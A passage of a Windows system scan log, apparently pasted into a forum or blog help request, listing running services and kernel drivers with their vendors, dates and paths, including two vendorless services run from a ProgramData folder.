SRV - [2015/03/15 22:30:10 | 000,294,912 | ---- | M] () [Auto | Running] -- C:\ProgramData\idxsvc\msmsvc.exe -- (idxsvc)
SRV - [2015/03/15 22:30:10 | 000,294,912 | ---- | M] () [Auto | Running] -- C:\ProgramData\idxsvc\msmsvc.exe -- (aavupd)
SRV - [2015/03/08 20:36:40 | 000,056,648 | ---- | M] (Google Inc.) [Auto | Running] -- C:\Program Files (x86)\Google\Chrome Remote Desktop\42.0.2311.39\remoting_host.exe -- (chromoting)
SRV - [2014/03/21 07:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2011/11/29 19:16:12 | 000,109,984 | ---- | M] (CypherTec Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\CypherTec\cgrdsrv32.exe -- (CypherGuard cguard Service 32bit Edition)
SRV - [2011/09/09 18:28:30 | 002,656,280 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2011/09/09 18:28:00 | 000,326,168 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2011/08/16 14:03:16 | 000,016,384 | ---- | M] (Hewlett-Packard) [Auto | Stopped] -- C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe -- (CalendarSynchService)
SRV - [2011/08/12 09:54:32 | 001,128,952 | ---- | M] (PDF Complete Inc) [Auto | Running] -- C:\Program Files (x86)\PDF Complete\pdfsvc.exe -- (pdfcDispatcher)
SRV - [2011/02/24 00:10:24 | 000,212,944 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe -- (jhi_service)
SRV - [2011/02/08 01:56:11 | 000,138,192 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe -- (IJPLMSVC)
SRV - [2010/03/18 13:16:28 | 000,130,384 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2014/02/02 16:17:40 | 000,124,192 | ---- | M] (CypherTec Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\cymon.sys -- (Cymon)
DRV:[b]64bit:[/b] - [2013/10/15 17:50:00 | 000,169,720 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mkd3kfnt.sys -- (Mkd3kfNt)
DRV:[b]64bit:[/b] - [2013/05/31 09:17:00 | 000,112,888 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Mkd2Nadr.sys -- (Mkd2Nadr)
DRV:[b]64bit:[/b] - [2012/12/21 07:20:07 | 000,015,344 | ---- | M] (Wacom Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wacomrouterfilter.sys -- (wacomrouterfilter)
DRV:[b]64bit:[/b] - [2012/12/20 08:01:19 | 000,082,416 | ---- | M] (Wacom Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wachidrouter.sys -- (WacHidRouter)
DRV:[b]64bit:[/b] - [2012/12/20 08:01:19 | 000,014,320 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidkmdf.sys -- (hidkmdf)
DRV:[b]64bit:[/b] - [2012/12/13 13:50:36 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2012/11/13 16:49:00 | 000,098,104 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Mkd2BthF.sys -- (Mkd2Bthf)
DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:[b]64bit:[/b] - [2012/03/01 15:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2011/12/09 07:33:51 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2011/12/09 07:33:51 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2011/12/08 14:55:55 | 000,031,152 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\pmxdrv.sys -- (pmxdrv)
DRV:[b]64bit:[/b] - [2011/11/16 15:42:19 | 000,565,352 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:[b]64bit:[/b] - [2011/11/15 18:38:56 | 000,557,848 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:[b]64bit:[/b] - [2011/10/25 06:56:52 | 010,203,648 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atikmdag.sys -- (amdkmdag)
DRV:[b]64bit:[/b] - [2011/10/25 05:40:06 | 000,310,784 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atikmpag.sys -- (amdkmdap)
DRV:[b]64bit:[/b] - [2011/09/09 18:25:13 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2011/06/07 23:07:00 | 000,231,440 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AtihdW76.sys -- (AtiHDAudioService)
DRV:[b]64bit:[/b] - [2010/11/21 12:24:33 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2010/11/21 12:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2010/11/21 12:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2009/07/14 10:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2009/07/14 10:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2009/07/14 10:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2009/06/18 01:54:30 | 000,057,872 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LMouFilt.Sys -- (LMouFilt)
DRV:[b]64bit:[/b] - [2009/06/18 01:54:22 | 000,055,312 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LHidFilt.Sys -- (LHidFilt)
DRV:[b]64bit:[/b] - [2009/06/18 01:54:14 | 000,013,328 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LHidEqd.sys -- (LHidEqd)
DRV:[b]64bit:[/b] - [2009/06/18 01:54:06 | 000,074,256 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LEqdUsb.sys -- (LEqdUsb)
DRV:[b]64bit:[/b] - [2009/06/11 05:37:05 | 006,108,416 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:[b]64bit:[/b] - [2009/06/11 05:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV - [2009/07/14 10:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]

  • eldla
  • 2015/05/05 (Tue) 23:49:43
トピックを確認する 
≪前へ  次へ≫
Template by  マシマロック